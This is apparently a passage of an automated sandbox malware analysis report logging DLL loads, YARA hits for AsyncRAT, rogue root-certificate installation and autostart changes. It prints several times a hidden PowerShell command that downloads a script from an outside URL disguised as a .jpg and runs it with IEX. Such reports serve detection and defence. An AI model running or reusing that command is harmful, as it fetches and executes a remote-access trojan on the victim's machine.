                      Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: winsta.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                      Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.2033951833.000002E7E3060000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.2026750928.000002E7E2FEF000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.2026750928.000002E7E2FEF000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: System.Management.Automation.pdb00100010007d1fa57c4aed9f0a32e84aa0faefd0de9e8fd6aec8f87fb03766c834c99921eb23be79ad9d5dcc1dd9ad236132102900b723cf980957fc4e177108fc607774f29e8320e92ea05ece4e821c0a5efe8f1645c4c0c93c1ab99285d622caa652c1dfad63d745d6f2de5f17e5eaf0fc4 source: powershell.exe, 00000004.00000002.2033951833.000002E7E3060000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbE source: powershell.exe, 00000004.00000002.2026750928.000002E7E2FEF000.00000004.00000020.00020000.00000000.sdmp

                      Data Obfuscation

                      barindex
                      .NET source code contains potential unpacker
                      Source: 19.2.powershell.exe.25703985aa8.4.raw.unpack, c599d343cac5014aad62aae883c42172b.cs.Net Code: c14bb2c7302fd95407b5e64edfbc46414 System.Reflection.Assembly.Load(byte[])
                      Source: 19.2.powershell.exe.25702485170.7.raw.unpack, xrossUpUgDCJrcSEI.cs.Net Code: nOoZahaniTFF System.AppDomain.Load(byte[])
                      Source: 19.2.powershell.exe.25701854fd0.5.raw.unpack, xrossUpUgDCJrcSEI.cs.Net Code: nOoZahaniTFF System.AppDomain.Load(byte[])
                      Source: 19.2.powershell.exe.2576eee0000.8.raw.unpack, c599d343cac5014aad62aae883c42172b.cs.Net Code: c14bb2c7302fd95407b5e64edfbc46414 System.Reflection.Assembly.Load(byte[])
                      Found suspicious powershell code related to unpacking or dynamic code loading
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($base64EncodedData)$ms = New-Object System.IO.MemoryStream$ms.Write($compressedData, 0, $compressedData.Length)$ms.Position = 0$gzip = New-Object System.IO.Compression.GZipStream $ms,
                      PowerShell case anomaly found
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe CMD /C pOwerShEll -WindowStyle hidden -ExecutionPolicy bypass -Command "[System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'DownloadString',[Microsoft.VisualBasic.CallType]::Method,'https://almamas.com.ly/wblwxiun.rtw/pnilrykd.jpg')|IEX;[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOwerShEll -WindowStyle hidden -ExecutionPolicy bypass -Command "[System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'DownloadString',[Microsoft.VisualBasic.CallType]::Method,'https://almamas.com.ly/wblwxiun.rtw/pnilrykd.jpg')|IEX;[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe CMD /C pOwerShEll -WindowStyle hidden -ExecutionPolicy bypass -Command "[System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'DownloadString',[Microsoft.VisualBasic.CallType]::Method,'https://almamas.com.ly/wblwxiun.rtw/pnilrykd.jpg')|IEX;[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname"Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOwerShEll -WindowStyle hidden -ExecutionPolicy bypass -Command "[System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'DownloadString',[Microsoft.VisualBasic.CallType]::Method,'https://almamas.com.ly/wblwxiun.rtw/pnilrykd.jpg')|IEX;[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname"Jump to behavior
                      Suspicious powershell command line found
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOwerShEll -WindowStyle hidden -ExecutionPolicy bypass -Command "[System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'DownloadString',[Microsoft.VisualBasic.CallType]::Method,'https://almamas.com.ly/wblwxiun.rtw/pnilrykd.jpg')|IEX;[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOwerShEll -WindowStyle hidden -ExecutionPolicy bypass -Command "[System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'DownloadString',[Microsoft.VisualBasic.CallType]::Method,'https://almamas.com.ly/wblwxiun.rtw/pnilrykd.jpg')|IEX;[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname"Jump to behavior
                      Yara detected MSILLoadEncryptedAssembly
                      Source: Yara matchFile source: 00000004.00000002.2026750928.000002E7E3053000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.1865192800.000002E7C8CF4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.1865192800.000002E7C8C60000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.2018457002.000002E7E2CD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.1867257966.000002E7C8E40000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.1868647268.000002E7CA7B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.1868900966.000002E7CACD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.1868900966.000002E7CB886000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2216, type: MEMORYSTR
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFB4B1663E1 push ebx; iretd 4_2_00007FFB4B16642A
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFB4B166435 push ebx; iretd 4_2_00007FFB4B16642A
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFB4B177969 push ebx; retf 4_2_00007FFB4B17796A
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_00007FFB4B162321 push eax; iretd 19_2_00007FFB4B16233D
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_00007FFB4B1655CB push esi; iretd 19_2_00007FFB4B1655D7
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_00007FFB4B1619BA pushad ; ret 19_2_00007FFB4B1619C9
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_00007FFB4B230569 push ebx; retf 19_2_00007FFB4B23056A
                      Source: 19.2.powershell.exe.25702485170.7.raw.unpack, BGdjDDpgXZdI.csHigh entropy of concatenated method names: 'VvznAZMSelWH', 'rZtkoDGEuzAf', 'NqXffOYeALLeoVmZl', 'cqhTNJjvrwLmZ', 'XAUzuNIIifMSBkBnA', 'aqMTzLLmknnK', 'opHXlstebrMYzK', 'vTYYhyfeTSN', 'QsBrxZsssig', 'OlbygUKhPPgbra'
                      Source: 19.2.powershell.exe.25702485170.7.raw.unpack, TUsMcMDxLo.csHigh entropy of concatenated method names: 'CqnoGKqodh', 'SdYLFIZlxIrMD', 'NPukkKbqHQkAA', 'kQvJJnzylSR', 'dkNHbIsXjTEa', 'DqFabvntiuwcPmpJt', 'NoVTeUWwRrrordIQ', 'deTFpRPLpi', 'FcaBKFLMUTtkJ', 'xZLyKkTQEHR'
                      Source: 19.2.powershell.exe.25701854fd0.5.raw.unpack, BGdjDDpgXZdI.csHigh entropy of concatenated method names: 'VvznAZMSelWH', 'rZtkoDGEuzAf', 'NqXffOYeALLeoVmZl', 'cqhTNJjvrwLmZ', 'XAUzuNIIifMSBkBnA', 'aqMTzLLmknnK', 'opHXlstebrMYzK', 'vTYYhyfeTSN', 'QsBrxZsssig', 'OlbygUKhPPgbra'
                      Source: 19.2.powershell.exe.25701854fd0.5.raw.unpack, TUsMcMDxLo.csHigh entropy of concatenated method names: 'CqnoGKqodh', 'SdYLFIZlxIrMD', 'NPukkKbqHQkAA', 'kQvJJnzylSR', 'dkNHbIsXjTEa', 'DqFabvntiuwcPmpJt', 'NoVTeUWwRrrordIQ', 'deTFpRPLpi', 'FcaBKFLMUTtkJ', 'xZLyKkTQEHR'

                      Persistence and Installation Behavior

                      barindex
                      Installs new ROOT certificates
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior

                      Boot Survival

                      barindex
                      Yara detected AsyncRAT
                      Source: Yara matchFile source: 21.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.powershell.exe.25702485170.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.powershell.exe.257018be6f0.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.powershell.exe.25702485170.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.powershell.exe.25701854fd0.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.powershell.exe.25701854fd0.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.powershell.exe.25701870610.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.powershell.exe.257018be6f0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.powershell.exe.25701870610.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000015.00000002.3894017282.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.1753014941.0000025703E64000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.1753014941.0000025702269000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.1753014941.0000025701869000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.1753014941.00000257013AA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 1012, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: aspnet_compiler.exe PID: 6676, type: MEMORYSTR
                      Creates an undocumented autostart registry key
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Loading BitLocker PowerShell Module
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
